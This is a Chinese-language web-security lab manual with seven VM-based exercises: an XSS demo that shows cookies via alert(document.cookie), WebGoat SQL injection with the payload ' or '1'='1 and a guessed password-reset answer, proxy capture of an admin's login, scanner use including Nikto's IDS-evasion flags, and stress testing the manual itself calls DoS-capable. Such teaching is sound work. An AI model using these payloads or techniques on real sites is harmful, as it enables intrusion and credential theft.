Web安全实验
实验1、XSS跨站攻击实验
1、实验介绍
实验简介
- 实验所属系列:Web安全实验
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学时
- 实验类别:实践实验类
- 实验附件:https://xpro-adl.91ctf.com/userdownload?filename=XSS跨站攻击实验.rar&type=attach
实验目标
- 了解跨站攻击产生原因
- 了解跨站攻击所能产生的效果
预备知识
1、什么是跨站攻击?
定义一:即Cross Site script Execution(通常简写为XSS)是指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。
定义二:指入侵者在远程WEB页面的HTML代码中插入具有恶意目的的数据,用户认为该页面是可信赖的,但是当浏览器下载该页面,嵌入其中的脚本将被解释执行。
由于HTML语言允许使用脚本进行简单交互,入侵者便通过技术手段在某个页面里插入一个恶意HTML代码,例如记录论坛保存的用户信息 (Cookie),由于Cookie保存了完整的用户名和密码资料,用户就会遭受安全损失。如这句简单的Javascript脚本就能轻易获取用户信息:alert(document.cookie),它会弹出一个包含用户信息的消息框。入侵者运用脚本就能把用户信息发送到他们自己的记录页面中,稍做分析便获取了用户的敏感信息。
2、跨站漏洞成因
成因很简单,就是因为程序没有对用户提交的变量中的HTML代码进行过滤或转换。
3、防范跨站攻击
对于普通用户而言:
在你的WEB浏览器上禁用java脚本,具体方法,先打开你的IE的internet选项,切换到“安全”页,有个“自定义”级别,点他出现如下窗口,禁用就可以了。但是好象不太可能,因为一旦禁用,很多功能就丧失了,这个方法是下策。还有不要访问包含〈〉字符的连接,当然一些官方的URL不会包括任何脚本元素。
对于开发人员而言:
如果你的站点程序含论坛,留言板,以及其他程序中含提交数据格式的。需要对提交数据进行过滤,如:转换掉“<”和“>”,使用户不能构造Html标记;过滤掉“:”和“&”,使用户不能将标记的属性设为script;过滤掉空格,使用户不能引发事件机制等。
2、实验步骤
一、实验准备
1、登录WindowsXP虚拟机打开本地“远程桌面连接”工具,输入IP地址,进入远程登录界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,请以实际的为准。)
(1)远程桌面连接,如下图所示。
(2)输入登录用户名和登录密码,如下图所示。
(3)登录成功,如下图所示:
二、XSS跨站攻击实验
1、登录Windowsserver2003虚拟机,输入用户名和密码。
2、点击“开始”→“所有程序”→“附件”→“命令提示符”,进入命令行界面,输入命令:ipconfig,查询本机的IP地址并记录,用于WindowsXP访问时使用,如下图所示。
3、随后右键点击桌面上“我的电脑”图标,在弹出的菜单中选择“管理”,如图所示。
4、在“计算机管理”界面中,依次点击“服务和应用程序”→“Internet信息服务(IIS)”→“网站”,将除xss网站之外的所有网站关闭,只开启xss网站,如图所示。
5、在WindowsXP上打开IE浏览器,在地址栏输入WindowsServer2003的IP地址http://192.168.41.214/index.asp。
6、在打开的页面中的文本框中输入任意字符串,比如:“helloworld!”,如下图:
7、点击“登陆”按钮后,在打开的新页面中将刚才输入的内容显示了出来。如下图:
8、可见本页面的功能是将用户填写的内容原封不动显示出来。在浏览器中重新打开“http://192.168.41.214/index.asp”,在文本框中输入如下内容:“,并点击“登陆”按钮。如下图:
14、可以看到用户cookie的内容在弹出框中被显示出来了,如下图所示。
3、分析和思考
1、XSS的概念是什么。
2、跨站攻击对用户产生的危害是什么。
实验2、webgoat的使用
1、实验介绍
实验简介
- 实验所属系列:Web安全实验
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学时
- 实验类别:实践实验类
- 实验附件:https://xpro-adl.91ctf.com/userdownload?filename=webgoat的使用.rar&type=attach
实验目标
- 掌握基于应用层的弱点测试手段与方法。
预备知识
WebGoat是一个用来演示Web应用程序中的典型安全漏洞的应用程序,用于在应用程序安全审计的上下文中系统地、有条理地讲解如何测试和利用这些安全漏洞。WebGoat是用Java语言写成的,因此可以安装到所有带有Java虚拟机的平台之上。此外,它还分别为Linux、OS X Tiger和Windows系统提供了安装程序。部署该程序后,用户就可以进入课程了,该程序会自动通过记分卡来跟踪用户的进展。当前提供的训练课程有30多个,其中包括:跨站点脚本攻击(XSS)、访问控制、线程安全、操作隐藏字段、操纵参数、弱会话cookie、SQL盲注、数字型SQL注入、字符串型SQL注入、web服务、Open Authentication失效危险的HTML注释等等。
虽然WebGoat中对于如何利用漏洞给出了大量的解释,但是还是比较有限,尤其是对于初学者来说,但觉得这正是其特色之处:WebGoat的每个教程都明确告诉你存在什么漏洞,但是如何去攻破要你自己去查阅资料,了解该漏洞的原理、特征和攻击方法,甚至要自己去找攻击辅助工具。
这里我们先给出其中两个实验的原理,其他的读者可自行学习。
1、SQL注入:SQL注入是一种利用用户输入构造SQL语句的攻击。 如果Web应用没有适当的验证用户输入的信息,攻击者就有可能改变后台执行的SQL语句的结构。由于程序运行SQL语句时的权限与当前该组建(例如,数据库服务器、Web应用服务器、Web服务器等)的权限相同,而这些组件一般的运行权限都很高,而且经常是以管理员的权限运行,所以攻击者获得数据库的完全控制,并可能执行系统命令。
String SQL Injection测试项原理:SQL注入攻击是对于数据库网站的严重威胁。其攻击的方法易于学习但是攻击所造成的损害的范围却相当广泛。因此过滤所有输入数据,特别在操作系统中使用的命令、脚本、数据不失为正确的做法,这在一定程度上对SQL威胁实现了预防。
2、认证安全漏洞原理
Authentication Flaws:Authentication Flaws是存在于网络设备所使用的互联网操作系统中的一种漏洞。系统中存在认证绕过漏洞,可能允许远程攻击者绕过扩展认证,非授权访问网络资源的问题。 攻击者可以通过向系统发送畸形报文的方式完成扩展认证,非授权访问网络资源。
Forgot Password测试项原理:Web应用程序经常提供一种让他们的用户能够找回忘记的密码的机制,但通常许多Web应用程序无法正确执行这种机制,用来验证用户身份的信息往往是过于简单的。这就在某种程度上提供了一种可攻击的漏洞。
2、实验步骤
一、实验准备
1、登录Windowsxp虚拟机打开本地“远程桌面连接”工具,输入IP地址,进入远程登录界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,请以实际的为准。)
(1)远程桌面连接,如下图所示。
(2)输入登录用户名和登录密码,如下图所示。
(3)登录成功,如下图所示:
二、webgoat的使用
1、打开C:\tools\AHCJ154\webgoat的使用\WebGoat-5.2,进入WebGoat-5.2文件夹,打开后双击打开其中的webgoat批处理文件。
2、运行批处理文件后,等待程序处理,在命令行窗口中会显示Tomcat的动态运行状态,如图所示
3、检查浏览器设置,“IE浏览器工具”→“Internet选项”→“连接”→“局域网设置”,设置成为“自动检测设置”。如下图所示。
打开InternetExplorer浏览器,在地址栏中输入:http://localhost/WebGoat/attack,用户名:guest,口令:guest。4、在打开的页面中点击“StartWebGoat”。
5、首先我们进行字符串型SQL注入实验。
在左侧列表中找到StringSQLInjection一项,点击进入。如下图所示
6、进入后在用户提交信息的窗口中可以看到提示的SQL语言:SELECT*FROMuser_dataWHERElast_name=‘YourName’,该测试项为StringSQLInjection,对于SQL语句中的“’”元字符,它作为查询参数的左闭合符号,可以在YourName中输入“’”使其闭合。故我们输入’or‘1’=’1这样,原来SQL语句中的’就作为了’1的右闭合符号。然后点击“Go!”。如下图所示。
7、然后看到我们此次输入所产生的SQL查询命令。这样就得到了所有的用户列表。该攻击完成,左侧打上了绿色的对勾。
8、下面我们进行ForgotPassword项的攻击。在左侧列表中找到ForgotPassword一项,点击进入。
9、通常情况下程序员都会采用有意义的名称作为表明和字段名。一般管理员表为admin,新闻表news,留言簿guestbook或guest,文章系统表article。因此利用一些经验和可能的猜测回答来**系统,获取用户密码。此处我们尝试admin,然后点击“Submit”。
10、弹出以下页面,说明用户名存在,现在要求回答认证问题,由要求可以得知Webgoat用户的答案为red,故猜测问答的答案可能仅仅为简单的颜色。
12、实验完成,关闭所有窗口和虚拟机。
3、分析和思考
String SQL Injection测试项原理是什么。
Forgot Password测试项原理是什么。
实验3、利用owasp zap扫描网站漏洞
1、实验介绍
实验简介
- 实验所属系列:Web安全实验
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学时
- 实验类别:实践实验类
- 实验附件:https://xpro-adl.91ctf.com/userdownload?filename=利用owasp zap扫描网站漏洞.rar&type=attach
实验目标
- 学习漏洞扫描技术基本原理,了解其在网络攻防中的作用
- 通过上机实验,学会使用owasp zap对目标网站扫描,并根据报告做出相应的防护措施。
预备知识
ZED攻击代理(ZAP)是一个易于使用的综合渗透测试工具,主要用于在Web应用程序中发现的漏洞。它可以被拥有安全经验广泛的人来使用,对开发者搞开发测试也是很有帮助的。而且对于刚开始从事渗透测试的人,效果也是比较理想的。 ZAP提供自动扫描仪以及一组工具,让你可以手动或者自动发现漏洞。
2、实验步骤
一、实验准备
1、登录winxp(攻击机)和winserver2003(靶机)打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,虚拟机系统在实际实验中可能不一样,但登录流程都是一样的,这里以WindowsServer2003为例。)
(1)远程桌面连接,如下图所示。
(2)输入登录用户名和登录密码,如下图所示。
(3)登录成功,如下图所示:
2、确认目标网站运行正常。右键点击桌面“我的电脑”图标,在弹出的菜单中选择“管理”,如图所示。
3、依次点击“服务和应用服务”→“Internet信息服务(IIS)”→“网站”,停止所有网站后,右键点击其中的“test”网站,在弹出的菜单中选择“启动”,如图所示。
4、在“test”网站上点击右键,在弹出的菜单中选择“浏览”,显示网站,如下图所示。
5、确认winxp(攻击机)中已经安装owaspzap本实验中,已经在winxp中安装好owaspzap,如下图所示。
6、如需要重装,请用如下目录下的安装包进行安装,如图所示。
二、用owsapzap对目标网站进行扫描
1、点击winxp桌面上的zap软件图标以启动软件,软件启动后,会弹出CA证书界面,选择“Later”,如下图所示
2、接下来打开“IE浏览器工具”→“Internet选项”→“连接”→“局域网设置”,如下图所示。
3、在“代理服务器”这项中,设置地址为127.0.0.1,端口设置为9090,并点击确定,如下图所示。
4、在winxp的IE浏览器中输入目标网站的IP地址:“http://192.168.41.207”(该地址仅作示例,实际中可能不一样,请按实际的输入),成功访问目标网站,如下图所示。
5、在zap中的站点位置即会出现当前访问的站点:http://192.168.41.207,如下图所示。
6、在zap中右击该站点,在弹出的菜单中选择“攻击”→“爬行站点”(下同),zap会爬行该网站的所有的URL地址,如下图所示。
7、爬行时间的长短由目标网站的大小决定。在本实验中搭建的目标网站比较小,所以耗费时间比较短。在zap界面的下方,我们可以看到爬行得到的该网站的所有URL,如下图所示。
8、与步骤6,7类似,可以依次对目标网站实施其他攻击,如:“端口扫描主机”、“主动扫描站点”等。当扫描完毕后,点击警报选项,会看到当前网站的所有警告信息,主要分为信息泄露警告、中级漏洞警告和高级漏洞警告,如下图所示。
9、单击CrossSiteRequestForgery,然后单击某个具体的URL地址,会自动弹出改地址当前漏洞的详细信息,比如级别、可靠性、参数、攻击行为、具体描述和解决方案等信息,网站管理人员或者开发人员就可以根据这些信息修复漏洞,如下图所示。
10、该软件还有报告功能,可以输出多种格式的报告,比如xml,html等多种格式,如下图所示。
11、保存报告后,软件会自动打开报告,然后可以浏览该报告,如下图所示。
3、分析和思考
扫描状态下如何探测是否可以用FTP和IIS中的漏洞进行测试。
单击CRSF(跨站请求伪造)分析某个具体的url地址的当前漏洞的详细信息。
实验4、HTTP漏洞扫描-webscarab使用
1、实验介绍
实验简介
- 实验所属系列:Web安全实验
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学时
- 实验类别:实践实验类
- 实验附件:https://xpro-adl.91ctf.com/userdownload?filename=HTTP-漏洞扫描-Webscarab漏洞扫描使用.rar&type=attach
实验目标
- 学习漏洞扫描技术基本原理,了解其在网络攻防中的作用
- 通过上机实验,学会使用WebScarab扫描器, 并根据报告做出相应的防护措施。
预备知识
这是一款代理软件,或许没有其它的工具能和OWASP的WebScarab如此丰富的功能相媲美了,如果非要列举一些有用的模块的话,那么他们包括HTTP代理,网络爬行、网络蜘蛛,会话ID分析,自动脚本接口,模糊测试工具,对所有流行的WEB格式的编码/解码,WEB服务描述语言和SOAP解析器等。WebScarab基于General Public License(GNU)版本协议。和Paros 一样是用JAVA编写的,因此安装它需要JRE。
WebScarab的HTTP代理提供了预期的功能(包括HTTPS拦截,不过和PAROS一样有认证报警)。WebScarab也提供了一些花哨的功能,比如SSL客户认证支持,十六进制或URL编码参数的解码,内置的会话ID分析和一键式“完成该会话”以增加效率等。就基本功能而言,WebScarab和PAROS差不多,但WebScarab为更懂技术的用户提供了更多的功能,并提供了对隐藏的底层更多的访问。但是,由于PAROS更简单,我们仍推荐学者在开始时使用它。此工具是WebGoat中所使用的工具之一。
2、实验步骤
一、实验准备
1、登录winxp(攻击机)和winserver2003(靶机)打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,虚拟机系统在实际实验中可能不一样,但登录流程都是一样的,这里以WindowsServer2003为例。)
(1)远程桌面连接,如下图所示。
(2)输入登录用户名和登录密码,如下图所示。
(3)登录成功,如下图所示:
2、确认目标网站运行正常。右键点击桌面“我的电脑”图标,在弹出的菜单中选择“管理”,如图所示。
3、依次点击“服务和应用服务”→“Internet信息服务(IIS)”→“网站”,停止所有网站后,右键点击其中的“test”网站,在弹出的菜单中选择“启动”,如图所示。
4、在“test”网站上点击右键,在弹出的菜单中选择“浏览”,显示网站,如下图所示。
二、用webscarab对目标网站进行扫描
1、在确保WindowsServer2003网站能够正常访问的情况下,接下来打开“IE浏览器””→”Internet选项”→”连接”→“局域网设置”,配置连接代理,代理名称为localhost,代理端口为8008,如下图所示。
2、设置完成后,关闭IE浏览器,进入C:\tools\AHCJ156\WEBSCARAB目录中,双击webscarab-selfcontained图标,运行webscarab,如图所示。
3、打开IE,访问目标网站192.168.41.207(访问之前请确保webscarab已经运行),之后回到webscarab,若webscarab主界面出现如下图所示的类界面,则说明webscarab已经正常运
3、接下来可以在Summary选项卡里分析已经抓取到的内容。webscarab将当前已经抓取到的网页内容都以树状列表列出来,如:“status”(HTTP状态码,代表相应的状态)、“methods”、“set-cookie”、“scripts”等信息,如下图所示。
4、接下来可以具体分析某个URL的情况,右击下方区域中的某个ID,选择“showconversation”,如下图所示:
5、选择“Parsed”会出现该URL的具体情况页面,如果这个URL对应的是图片,则显示出该图片的具体内容,如下图所示。
6、这里也可以选择“Raw”选项卡,直接显示代码,即没有经过解释分析的内容,如下图所示。
11、在“Intercept”中,可以配置需要监听的请求方法和一些文件路径匹配的名字,如下图所示。
12、通过此方法,可以抓取到一些关键字,下面我们登录网站后台登录地址,通过该方法,
能够抓取到管理员登录后台的用户名和密码,如下图所示。
(1)在webscarab中,对应的checkadmin.asp页面详细信息中,可以看到抓取到的管理员的登录用户名和登录密码,如下图所示。
(2)管理员访问后台,输入用户名和密码(均为admin)并点击登录,如下图所示。
实验完成
3、分析和思考
为什么访问目标网站之前要确保webscarab已经运行。
选择“intercept”如何配置我们要监听的请求方法和一些文件路径匹配的名字。
实验5、HTTP漏洞扫描-paros漏洞扫描使用
1、实验介绍
实验简介
- 实验所属系列:Web安全实验
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学时
- 实验类别:实践实验类
- 实验附件:https://xpro-adl.91ctf.com/userdownload?filename=HTTP漏洞扫描-paros漏洞扫描使用.rar&type=attach
实验目标
- 学习漏洞扫描技术基本原理,了解其在网络攻防中的作用
- 通过上机实验,学会使用paros对目标网站扫描,并根据报告做出相应的防护措施
预备知识
Paros是一种利用纯java语言开发的安全漏洞扫描工具,它主要是为了满足那些需要对自己的web应用程序进行安全检测的应用者而设计的。通过Paros的本地代理,所有在客户端与服务器端之间的http和https数据信息,包括cookie和表单信息都将被拦截或者是修改。
paros proxy,这是一个对Web 应用程序的漏洞进行评估的代理程序,即一个基于Java的web 代理程序,可以评估Web应用程序的漏洞。它支持动态地编辑/查看 HTTP/HTTPS,从而改变cookies 和表单字段等项目。它包括一个Web 通信记录程序,Web 圈套程序(spider),hash 计算器,还有一个可以测试常见的Web 应用程序攻击(如SQL注入式攻击和跨站脚本攻击)的扫描器。该工具检查漏洞形式包括:SQL 注入、跨站点脚本攻击、目录遍历、CRLF – Carriage-Return Line-Feed 回车换行等。
2、实验步骤
一、实验准备
1、登录winxp(攻击机)和winserver2003(靶机)打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,虚拟机系统在实际实验中可能不一样,但登录流程都是一样的,这里以WindowsServer2003为例。)
(1)远程桌面连接,如下图所示。
(1)远程桌面连接,如下图所示。(2)输入登录用户名和登录密码,如下图所示。
(3)登录成功,如下图所示
2、确认目标网站运行正常。右键点击桌面“我的电脑”图标,在弹出的菜单中选择“管理”,如图所示。
3、依次点击“服务和应用服务”→“Internet信息服务(IIS)”→“网站”,停止所有网站后,右键点击其中的“test”网站,在弹出的菜单中选择“启动”,如图所示。
4、在“test”网站上点击右键,在弹出的菜单中选择“浏览”,显示网站,如下图所示。
5、启动winxp中的paros软件,如下图所示。
6、若winxp中没有安装paros,请打开下图所示目录中的paros安装包进行安装(安装过程较为简单,在此不再详述)。
7、成功启动后,如下图所示。
二、用paros对目标网站进行扫描
1、在确保目标网站能够正常访问的情况下,接下来打开“IE浏览器””→”Internet选项”→”连接”→“局域网设置”,配置连接代理,代理名称为127.0.0.1,代理端口为8090,如下图所示
2、设置完成后,关闭IE浏览器,然后运行paros,接着再打开IE,访问目标网站192.168.41.207
(访问之前请确保paros已经运行),之后回到paros,若paros主界面出现如下图所示的类界面,则说明paros已经正常运行。
(访问之前请确保paros已经运行),之后回到paros,若paros主界面出现如下图所示的类界面,则说明paros已经正常运行。注意:如果在启动paros时弹出错误提示,说明端口号8090(localhost所用端口)和8443(paros本身所用端口)可能被占用,此时我们只需要修改paros的本地端口号(”paros”→”Tools”→”Options”→”Localproxy”),和IE浏览器的代理端口号,使之一样即可,如下图所示。
3、Spider是Paros中一个非常重要的功能,它是用来抓取网站信息,收集URL地址信息,
通过Spider这种方式来来逐层分解抓取站点的URL。右键单击“192.168.41.207”目标网站(实验中,目标网站的IP可能会有所不同,请按实际的IP进行访问),然后选择“spider”,出现spider界面,选择“start”,如下图所示。
当前,它的功能包括如下:1)通过提供的URL地址来抓取HTTP或者HTTPS信息2)支持抓取Cookie信息3)支持设置代理链4)自动添加URL地址,并以树结构分层进行扫描Spider存在的一些缺陷,如下:1)对于具有非法验证的SSL协议的站点不能被扫描2)不支持多线程3)对于在HTML中存在异常URL地址的页面不能被识别4)Javascript生成的URL地址不能被识别
注意:对于不能被识别的URL地址,Paros也可以扫描,需要通过手动添加即可。
4、针对“site”栏中的URLS进行扫描,逐一检查对URLS分别进行安全性检查,验证是否存在安全漏洞。如果想扫描"site"栏中所有的URLS,单击”anaylse”→”scanal”l可以启动全部扫描。如果只想扫描“site”栏中某一URL,选中该URL,右击鼠标,选取scan命令。以192.168.41.207目标网站为例,如下图所示。
关于扫描设置,可以对单个页面进行扫描,也可以对整个站点进行扫描。Scanner可以针对一下几种情况进行扫描:1)SQL注入2)XSS跨站点脚本攻击3)目录遍历4)CRLF–Carriage-ReturnLine-Feed回车换行等。注意:Paros扫描是针对每个网站URL地址进行分层扫描,精确到每个一个独立的URL地址,都需要进行漏洞检测。5、关于扫描策略的设置(“Analyse”→”ScanPolicy”),如下图所示。
1)搜集的信息有如下分类:过期的文件、私有IP的暴露、URL地址中可以改写的SessionID、过期文件的扩展检查。
2)客户端浏览器有如下分类:表单自动完成密码的保存、浏览过程中保存的安全性文件的缓存信息。
3)服务器端安全有如下分类:正在浏览的目录信息、IIS服务的默认文件等各种服务器的默认文件。
4)SQL注入有如下分类基本的sql语句构造、目录上传、服务器站点注入、跨站脚本注入等。
6、Filter过滤器的用途:
1)检测并警告你在HTTP消息中一些预定义发生的模式,因此你不需要去捕获每个HTTP消息,而只需要寻求你所需要的模式。
2)记录一些你所感兴趣的信息,例如Cookie等。在数据传输中,过滤器会对每一个HTTP消息进行拦截检测,如果使用所有过滤将会大大降低Paros的扫描速度,所以通常我们只需要对我们需要的信息进行拦截过滤。
当前,有如下过滤器:
1)LogCookie记录所有浏览器端到服务器端接收的Cookies信息,并显示在面板中。
2)LogGetQuery记录所有HTTP(HTTPS)来自浏览器端获取的参数,并且日志的名称将以“get.xls”的形式保存在Paros目录下面。
3)LogPostQuery记录所有HTTP(HTTPS)来自浏览器端传送的参数,并且日志的名称将以“post.xls”的形式保存在Paros目录下面。
4)CookieDetectFilter提醒你在返回HTTP消息中尝试去设置并修改Cookie信息。
5)IfModifiedSinceFilter在HTTP请求中删除“If−Modified−Since”和“If−None−Match”这头信息选项,它将检索“HTTP200OK”,而不是“HTTP304notmodified”。
7、扫描完成后,单击”Report”→”LastScanreport”,可查看当前的扫描报告,如下图所示
8、扫描报告出来后,需对其进行认真分析,对于扫描出来的漏洞可以根据paros提供的解决方案加以补救,以免被他人发现造成更大的损失。9、实验完成,关闭所有窗口和虚拟机。
3、分析和思考
Spider的作用是什么。
Spider如何应如何扫描不能被识别的URL地址。
实验6、HTTP漏洞扫描-nikto漏洞扫描工具检测网站安全
1、实验介绍
实验简介
- 实验所属系列:Web安全实验
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学时
- 实验类别:实践实验类
- 实验附件:https://xpro-adl.91ctf.com/userdownload?filename=HTTP漏洞扫描-nikto漏洞扫描工具检测网站安全.rar&type=attach
实验目标
- 通过证书认证中心的搭建,理解基于公钥的安全服务基础设施(PKI)通过证书认证中心的搭建
- 理解基于公钥的安全服务基础设施(PKI)的基本理论。
预备知识
nikto是一款开源的(gpl)网页服务器扫描器,它可以对网页服务器进行全面的多种扫描,包含超过3300种有潜在危险的文件;超过625种服务器版本;超过230种特定服务器问题,包括多种有潜在危险的文件、cgi及其他问题,它可以扫描指定主机的web类型、主机名、特定目录、cookie、特定cgi漏洞、返回主机允许的http模式等等。扫描项和插件可以自动更新(如果需要)。基于whisker/libwhisker完成其底层功能。这是一款非常棒的工具,nikto是网管安全人员必备的web审计工具之一。
2、实验步骤
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,虚拟机系统在实际实验中可能不一样。这里以Windows Server 2003为例。)远程桌面连接,如下图所示
远程登录,如下图所示。
2、打开目录“C:\toos\AHCJ158\nikto”。如下图所示。
3、双击activeperl-5.10.0.100进行安装,进入向导界面,点击“Next”。如下图所示。
4、进入许可协议界面。勾选“I accept the terms in the License Agreement”,点击“Next”。如下图所示。
5、进入安装路径选择界面,将安装路径设置为“C:\tools\AHCJ158\Perl”,点击“Next”。如下图所示。
5、进入安装路径选择界面,将安装路径设置为“C:\tools\AHCJ158\Perl”,点击“Next”。如下图所示。6、进入“option selection”界面,安装默认设置,点击“Next”。如下图所示。
7、点击“Install”以完成安装。如下图所示。
7、点击“Install”以完成安装。如下图所示。8、点击“开始”→“运行”,输入cmd,输入命令“cd C:\tools\AHCJ158\nikto\nikto”进入nikto文件夹。如下图所示。
9、在这个文件夹中可以运行nikto,它的一般格式为:perl nikto.pl -h目标主机-其它参数(以下输入命令:perl nikto.pl -h 192.168.41.208,其中“192.168.41.208”为本机IP地址)。如下图所示。
10、各参数项的作用如下:在nikto中部分参数使用全称或参数的第一个字母均可,如-config和-c是等同的,在下面各项中,使用此写法:-c(config)的均表示此项参数用参数项全称或首字母均可。
-c(config):使用指定的config文件来替代安装在本地的config.txt文件。
-c(cgidirs):扫描包含指定内容的cgi目录。所包含的内容在-c后面指定。如-c /cgi/。
-d(display):打开或关闭默认输出。输出选项:
1显示重定向
2显示获取的cookies信息
3显示所有200/ok的回应
4显示请求认证的urls
d debug输出v冗余输出
-dbcheck:检查数据库和其它重要文件的句法错误。
-e(evasion):使用libwhisker中对ids的躲避技术,可使用以下几种类型:
1随机url编码(非utf-8方式)
2自选择路径(/./)
3过早结束的url
4优先考虑长随机字符串
5参数欺骗
6使用tab作为命令的分隔符
7使用变化的url
8使用windows路径分隔符“\”
-f(findonly):只寻找http或https端口,不进行完全扫描。-f(format):指定检测报告输出文件的格式,默认是txt文件格式(可以是htm、csv、txt或xml格式)
-h(host):指定目标主机,可以是ip或域名。
-h(help):显示帮助信息。
-i(id):用于主机鉴定,其格式为:userid:password-m(mutate):猜解更多的文件名:
1检测根目录下的所有文件
2猜测密码文件名
3通过apache(/user请求类型)枚举用户名
14、实验完成
3、分析和思考
nikto主要参数的作用是什么。
分析在"C:toolsACHJ158NIKTOniktooutput.txt"文件。
实验7、HTTP安全测试-WAS微软的压力测试工具
1、实验介绍
实验简介
- 实验所属系列:Web安全实验
- 实验对象:本科/专科信息安全专业;相关工作从业人员;应用安全爱好者
- 相关课程及专业:网络安全
- 实验时数(学分):2学时
- 实验类别:实践实验类
- 实验附件:https://xpro-adl.91ctf.com/userdownload?filename=HTTP安全测试-WAS微软的压力测试工具.rar&type=attach
实验目标
- 通过具体实验用例,掌握WAS微软压力测试工具的基本用法,并对相关Web服务器进行压力测试
预备知识
Web压力测试是目前比较流行的话题,利用Web压力测试可以有效地测试一些Web服务器的运行状态和响应时间等等,这些对于Web服务器的承受力测试是个非常好的。Web压力测试通常是利用一些工具,例如微软的web application stress、Linux下的siege、功能全面的web-ct等等,这些都是非常优秀的Web压力测试工具。
Microsoft web application stress tool 是由微软的网站测试人员所开发,专门用来进行实际网站压力测试的一套工具。透过这套功能强大的压力测试工具,您可以使用少量的客户端计算机仿真大量用户上线对网站服务所可能造成的影响,在网站实际上线之前先对您所设计的网站进行如同真实环境下的测试,以找出系统潜在的问题,对系统进行进一步的调整、设置工作。同样因为这些特性,使它具备了D.O.S(拒绝服务攻击)轰炸的功能。
D.O.S是一种通过使你的服务计算机崩溃或把它压跨来阻止你提供服务的手段。简单来说,就是D.O.S可以让你的计算机提供可能多的服务从而使你的计算机陷入崩溃的边缘或崩溃。
2、实验步骤
1、打开本地“远程桌面连接”工具,输入IP地址,进入远程登陆界面,输入账号和密码,进入虚拟机。(注:IP地址、账号和密码都是从WEB平台获取的当前实验虚拟机信息,IP地址和密码在实际实验中会有变化,虚拟机系统在实际实验中可能不一样。这里以Windows Server 2003为例。)远程桌面连接,如下图所示。
远程登录,如下图所示。
3、点击“开始”→“管理工具”→“Internet 信息服务(IIS)管理器”。如下图所示。
4、右击“网站”→“新建”→“网站”。如下图所示。
5、进入网站创建向导界面。输入网站描述“Test”,点击“下一步”。如下图所示。
6、进入IP地址和端口设置界面,将网站IP地址指定为本机IP地址,点击“下一步”。如下图所示。
7、将网站主目录设置为“C:\tools\AHCJ159\Test”。如下图所示。
8、赋予相应的权限。然后点击“下一步”以完成网站创建工作。如下图所示。
9、右击“Test”,点击“属性”。如下图所示。
10、点击“文档”→“添加”,然后输入“test.html”,然后选中test.html点击“上移”。结果如下图,然后点击“确定”
11、打开目录“C:\tools\AHCJ159\Test”。新建test.html网页,输入内容“ni hao”。如图所示。
12、打开工具目录“C:\tools\AHCJ159\was”。如下图所示。
13、双击“wassetup.exe”安装程序,接受安装协议,点击“yes”,即可自动安装此软件。如下图所示。
14、将安装路径设置为“C:\tools\AHCJ159\Microsoft Web Application Stress Tool”,点击“next”下一步。如下图所示。
15、点击“ok”然后点击“finish”以完成安装工作。如下图所示。
16、点击“开始”→“所有程序”→“Microsoft Web Application Stress Tool”→“Microsoft Web Application Stress Tool”。如下图所示。
18、在“settings”的功能设置中,一个是stress level (threads),这里是指定程序在后台用多少线程进行请求,也就是相当于模拟多少个客户机的连接,更加形象的就是说设置多少轰炸的线程数。一般填写500~1000,因为这个线程数是根据本机的承受力来设置的。在“test run time”中来指定一次压力测试需要持续的时间,分为天、小时、分、秒几个单位级别,可以根据实际情况来设置。其余的选项不太重要,保持默认设置即可。如下图所示。
19、was压力测试应用实例下面利用web application stress进行一次web压力测试。步骤1:在工具中点右键,选择add命令,增加了一个新的测试项目:new script,对它进行设置,在主选项中的server中填写要测试的服务器的IP地址。在下方选择测试的web连接方式,这里的方式verb选择get,path选择要测试的web页面路径,这里填写/test.html,即Test网站的首页。如下图所示。
点击“Overview”,将看到这个测试活动的一个简要快速的分析。如下图所示。
从ASP的技术角度看,Request per Second,是一个需要深入分析的关键值。这个值越高越好。通常,如果你不能从使用报告和预算中决定出一个特定的目标,你可以让ASP 的Requests per Second值高于30,当然这个ASP是没有连数据库或使用其他组件的。因为可以预见,连接数据库将增加程序的负担。一个特别有用的计数器是ASP Requests Queued,这个计数器往往是在识别一个阻塞或长期驻留的页面或组件时的关键。
关于分析ASP性能的资源有:
·Tuning Internet Information Server Performance
·Navigating the Maze of Settings for Web Server Performance Optimization
·IIS 4 Resource Kit
24、影响性能和可测量性的因素服务器组成,数据库访问,和其他因素会大大降低ASP的Request per Second值。不同的配置选择也会起到不同的作用,在这里我要指出几个常出现的因素:
·如果你在访问一个数据库,你是否有做连接池?关于连接池的详细资料请看Pooling in the Microsoft Data Access Components.
